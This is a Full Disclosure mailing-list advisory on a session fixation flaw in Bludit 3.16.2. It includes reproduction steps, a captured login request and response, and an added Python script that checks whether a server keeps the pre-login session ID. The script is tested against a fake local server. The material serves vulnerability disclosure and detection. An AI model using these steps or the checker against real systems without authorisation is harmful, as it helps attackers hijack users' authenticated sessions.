Message-ID: <CAF2Wu1Z+dzrOQmprS7UXRb0h9cMML7G0RMS6A1LkVBj70qPnjQ@mail.gmail.com>
Date: Sun, 6 Jul 2025 22:47:44 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Session Fixation - bluditv3.16.2
# Exploit Title: Session Fixation - bluditv3.16.2
# Date: 07/2025
# Exploit Author: Andrey Stoykov
# Version: 3.16.2
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Session Fixation #1:
Steps to Reproduce:
Visit the login page. Log in with a valid user and observe that the session ID
has not been changed.
// HTTP POST request logging in
POST /bludit/admin/ HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
tokenCSRF=551bee4a6e6d065481ec1d29d9b37335475ae1d0&username=admin&password=password&save=
// HTTP response
HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Jun 2025 20:34:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /bludit/admin/dashboard
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
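As an added example, not part of the original post and not Bludit's own code: a Python script that performs the steps above against a target and reports whether the session id handed out before login is still the session id after authentication. It assumes the session cookie is named PHPSESSID (pass cookie_name for anything else) and the form fields shown in the request above; the fake login server, its handler and the admin/password credentials are constructed for the example so it runs offline.

```python
# Added example (not from the original post, not Bludit's code): black-box
# session-fixation check.  GET the login page, POST valid credentials while
# presenting the pre-login cookie, compare the session id before and after.
import http.client
import secrets
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, urlencode

SESSION_COOKIE = "PHPSESSID"   # assumed cookie name; override via cookie_name


def extract_session_id(headers, name=SESSION_COOKIE):
    """Value of cookie `name` from a list of (header, value) pairs, or None."""
    for key, value in headers:
        if key.lower() == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            if name in jar:
                return jar[name].value
    return None


def classify(pre, post):
    """True when an id known before login is still the session id afterwards:
    the login response either set no new id or re-set the same one."""
    return pre is not None and (post is None or post == pre)


def _request(host, port, method, path, body=None, headers=None):
    """One HTTP exchange on a fresh connection; returns (status, header list)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheaders()
    finally:
        conn.close()


def check_session_fixation(host, port, login_path, creds,
                           cookie_name=SESSION_COOKIE, planted_id=None):
    """Step 1: visit the login page and record the id it hands out (or plant
    an attacker-chosen one if it hands out none).  Step 2: log in while
    presenting that id and see whether the login response replaces it."""
    _, pre_headers = _request(host, port, "GET", login_path)
    pre = extract_session_id(pre_headers, cookie_name) or planted_id
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if pre is not None:
        headers["Cookie"] = f"{cookie_name}={pre}"
    status, post_headers = _request(host, port, "POST", login_path,
                                    body=urlencode(creds), headers=headers)
    post = extract_session_id(post_headers, cookie_name)
    return {"status": status, "pre_login_id": pre, "post_login_id": post,
            "vulnerable": classify(pre, post)}


def make_handler(rotate_on_login):
    """Constructed stand-in for a PHP-style login.  rotate_on_login=False
    mirrors the behaviour reported above (301 to the dashboard, no Set-Cookie);
    True is the fix, i.e. a fresh id issued once the user is authenticated."""
    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *args):          # keep the example quiet
            pass

        def _issue_cookie(self):
            self.send_header("Set-Cookie",
                             f"{SESSION_COOKIE}={secrets.token_hex(16)}; Path=/; HttpOnly")

        def do_GET(self):
            self.send_response(200)
            if SESSION_COOKIE not in SimpleCookie(self.headers.get("Cookie", "")):
                self._issue_cookie()            # first visit: hand out an id
            self.send_header("Content-Length", "0")
            self.end_headers()

        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            form = dict(parse_qsl(self.rfile.read(length).decode()))
            if form.get("username") == "admin" and form.get("password") == "password":
                self.send_response(301)
                self.send_header("Location", "/bludit/admin/dashboard")
                if rotate_on_login:
                    self._issue_cookie()        # new id bound to the authed session
            else:
                self.send_response(200)         # failed login: back to the form
            self.send_header("Content-Length", "0")
            self.end_headers()
    return Handler


def run_against_fake(rotate_on_login):
    """Start the fake app on a free localhost port and run the check against it."""
    server = HTTPServer(("127.0.0.1", 0), make_handler(rotate_on_login))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_session_fixation("127.0.0.1", server.server_address[1], "/bludit/admin/",
                                      {"username": "admin", "password": "password", "save": ""})
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for rotate in (False, True):
        print(f"rotate_on_login={rotate} -> {run_against_fake(rotate)}")
```

Run as-is to see both outcomes on localhost. Against a live instance call check_session_fixation with the host, port and login path, and include the tokenCSRF value the login page issued in the creds dict, since the script does not fetch one itself. A 301 that carries no Set-Cookie at all, as in the response above, is the tell: the id that was valid before login is the one now bound to the authenticated session, so an attacker who got a victim to use a known id owns the session after the victim logs in.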
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/